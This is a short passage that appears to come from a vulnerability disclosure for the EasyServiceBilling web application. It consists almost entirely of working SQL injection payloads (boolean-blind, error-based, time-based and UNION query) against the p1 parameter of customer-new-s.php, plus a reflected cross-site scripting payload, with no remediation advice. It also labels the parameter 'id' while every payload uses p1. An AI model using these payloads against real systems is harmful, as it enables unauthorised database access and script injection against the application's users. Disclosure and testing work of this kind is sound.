Injection / Cross-Site Scripting
All of them use the same parameters. An attacker can use any of these.
====================================================
Parameter : id
Type : boolean-based blind
Demo :
http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney
Payload : Payload: p1=akkus+keyney' AND 1815=1815 AND 'izgU'='izgU
Type : error-based
Demo :
http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney
Payload : p1=akkus+keyney' AND (SELECT 2882 FROM(SELECT
COUNT(*),CONCAT(0x7162627171,(SELECT
(ELT(2882=2882,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UFGx'='UFGx
Type : AND/OR time-based blind
Demo :
http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney
Payload : p1=akkus+keyney' AND SLEEP(5) AND 'TJOA'='TJOA
Type : UNION query
Demo :
http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney
Payload : p1=akkus+keyney' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,0x4e70435a69565a6248565947566b74614e7a5969635671587073454f75726f53795477506d514567,0x717a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
====================================================
Payload :
http://test.com/EasyServiceBilling/customer-new-s.php?p1='
</script><script>alert(1)</script>‘;
